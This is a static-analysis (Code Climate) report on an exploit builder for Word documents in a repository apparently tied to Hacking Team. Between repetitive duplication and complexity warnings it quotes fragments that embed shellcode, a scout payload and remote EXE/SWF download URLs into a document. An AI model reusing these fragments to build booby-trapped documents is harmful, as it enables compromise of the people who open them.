Sign upLogin

hackedteam/vector-exploit

View on GitHub
Star
ht-2013-002-Word/exploit.py

Summary

Maintainability
F
1 wk
Test Coverage

Function create_doc has 29 lines of code (exceeds 25 allowed). Consider refactoring.
Open

def create_doc():
    # unpack zip file
    if not os.path.exists("tmp"):
        os.mkdir("tmp")
Severity: Minor
Found in ht-2013-002-Word/exploit.py - About 1 hr to fix

    Function create_doc has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring.
    Open

    def create_doc():
    # unpack zip file
    if not os.path.exists("tmp"):
        os.mkdir("tmp")
    Severity: Minor
    Found in ht-2013-002-Word/exploit.py - About 35 mins to fix

    Cognitive Complexity

    Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.

    A method's cognitive complexity is based on a few simple rules:

    • Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
    • Code is considered more complex for each "break in the linear flow of the code"
    • Code is considered more complex when "flow breaking structures are nested"

    Further reading

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    def create_doc():
    # unpack zip file
    if not os.path.exists("tmp"):
        os.mkdir("tmp")
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 4 days to fix
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 88..144

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 489.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    def four_byte_xor(buf, key):
    out = ''
    for i in range(0,len(buf)/4):
        c = struct.unpack("<I", buf[(i*4):(i*4)+4])[0]
        c ^= key
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 day to fix
    ht-2013-003-Powerpoint/exploit.py on lines 24..36
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 24..36
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 24..36

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 186.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    for i in range(len(ole_link_bytearray)):
    if i == ole_link_offt or i == ole_link2_offt or i == ole_link3_offt:
        y = 0
        for x in range(len(swf_url_bytearray)):
            ole_link_bytearray[i+y] = swf_url_bytearray[x]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 7 hrs to fix
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 240..246

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 114.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    if sys.argv[2][-1] == "/":
    EXE_URL = sys.argv[2] + EXE_RANDOM_NAME
    SWF_URL = sys.argv[2] + SWF_RANDOM_NAME
else:
    EXE_URL = sys.argv[2] + '/' + EXE_RANDOM_NAME
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 7 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 45..50
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 41..46
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 41..46

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 113.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 3 locations. Consider refactoring.
    Open

    def byteArray2String(param):
    with warnings.catch_warnings():
            warnings.simplefilter('ignore')
            tmp = os.tempnam()
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 2 other locations - About 7 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 80..98
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 71..89

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 112.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    def random_id(length):
    number = '0123456789'
    alpha = 'abcdefghijklmnopqrstuvwxyz'
    id = ''
    for i in range(0,length,2):
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 3 hrs to fix
    ht-2013-003-Powerpoint/exploit.py on lines 15..22
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 15..22
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 15..22

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 62.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    if SWF_URL[:4] != 'http' and SWF_URL[:4] != "HTTP":
    SWF_URL = "http://" + SWF_URL
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 54..55

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 44.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    if EXE_URL[:4] != 'http' and EXE_URL[:4] != "HTTP":
    EXE_URL = "http://" + EXE_URL
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 54..55
    ht-2013-003-Powerpoint/exploit.py on lines 52..53
    ht-2013-003-Powerpoint/exploit.py on lines 54..55

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 44.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_url)):
    swf_bytearray[stage2_offset + URL_OFFT + i] = hex_url[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 43.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_scout)):
    swf_bytearray[stage2_offset + SCOUT_OFFT + i] = hex_scout[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 43.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_scout)):
    swf_bytearray[stage264_offset + SCOUT_OFFT64 + i] = hex_scout[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 242..243
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 43.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 12 locations. Consider refactoring.
    Open

    for i in range(len(hex_url)):
    swf_bytearray[stage264_offset + URL_OFFT64 + i] = hex_url[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 11 other locations - About 1 hr to fix
    ht-2013-002-Word/exploit.py on lines 200..201
    ht-2013-002-Word/exploit.py on lines 206..207
    ht-2013-002-Word/exploit.py on lines 248..249
    ht-2013-003-Powerpoint/exploit.py on lines 214..215
    ht-2013-003-Powerpoint/exploit.py on lines 220..221
    ht-2013-003-Powerpoint/exploit.py on lines 255..256
    ht-2013-003-Powerpoint/exploit.py on lines 261..262
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 185..186
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 192..193
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 198..199
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 204..205

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 43.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    if len(shellcode64) > (5800*2):
       print "[!!] Shellcode too big: 0x%x" % (len(shellcode64))
       sys.exit(-1)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 1 hr to fix
    ht-2013-003-Powerpoint/exploit.py on lines 245..247

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 42.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    os.system("zip.exe \"" + send_to_server_zip + "\" " + EXE_RANDOM_NAME + " " + SWF_RANDOM_NAME)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 1 hr to fix
    ht-2013-003-Powerpoint/exploit.py on lines 332..332
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 266..266
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 275..275

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 39.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 6 locations. Consider refactoring.
    Open

    for i in range(len(hex_shellcode64)):
    swf_bytearray[stage264_offset + i] = hex_shellcode64[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 5 other locations - About 55 mins to fix
    ht-2013-002-Word/exploit.py on lines 193..194
    ht-2013-003-Powerpoint/exploit.py on lines 207..208
    ht-2013-003-Powerpoint/exploit.py on lines 249..250
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 178..179
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 192..193

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 37.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 6 locations. Consider refactoring.
    Open

    for i in range(len(hex_shellcode)):
    swf_bytearray[stage2_offset + i] = hex_shellcode[i]
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 5 other locations - About 55 mins to fix
    ht-2013-002-Word/exploit.py on lines 236..237
    ht-2013-003-Powerpoint/exploit.py on lines 207..208
    ht-2013-003-Powerpoint/exploit.py on lines 249..250
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 178..179
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 192..193

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 37.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 2 locations. Consider refactoring.
    Open

    if not os.path.exists("c:\\RCS\\DB\\config\\test"):
    SWF_RANDOM_NAME = random_id(12) + ".swf"
else:
    SWF_RANDOM_NAME = "avtest.swf"
    Severity: Minor
    Found in ht-2013-002-Word/exploit.py and 1 other location - About 55 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 39..42

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 37.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Identical blocks of code found in 4 locations. Consider refactoring.
    Open

    if len(shellcode) > 5800:
       print "[!!] Shellcode too big: 0x%x" % (len(shellcode))
       sys.exit(-1)
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 50 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 203..205
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 173..175
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 187..189

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 36.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    Similar blocks of code found in 4 locations. Consider refactoring.
    Open

    os.system("zip.exe -r \"" + send_to_target_zip + "\" \"" + output_file + "\"")
    Severity: Major
    Found in ht-2013-002-Word/exploit.py and 3 other locations - About 35 mins to fix
    ht-2013-003-Powerpoint/exploit.py on lines 326..326
    src/exploit_vps/html/admin/2013-002-Word/exploit.py on lines 260..260
    src/exploit_vps/html/admin/2013-003-PowerPoint/exploit.py on lines 269..269

    Duplicated Code

    Duplicated code can lead to software that is hard to understand and difficult to change. The Don't Repeat Yourself (DRY) principle states:

    Every piece of knowledge must have a single, unambiguous, authoritative representation within a system.

    When you violate DRY, bugs and maintenance problems are sure to follow. Duplicated code has a tendency to both continue to replicate and also to diverge (leaving bugs as two similar implementations differ in subtle ways).

    Tuning

    This issue has a mass of 33.

    We set useful threshold defaults for the languages we support but you may want to adjust these settings based on your project guidelines.

    The threshold configuration represents the minimum mass a code block must have to be analyzed for duplication. The lower the threshold, the more fine-grained the comparison.

    If the engine is too easily reporting duplication, try raising the threshold. If you suspect that the engine isn't catching enough duplication, try lowering the threshold. The best setting tends to differ from language to language.

    See codeclimate-duplication's documentation for more information about tuning the mass threshold in your .codeclimate.yml.

    Refactorings

    Further Reading

    There are no issues that match your filters.

    Category
    Status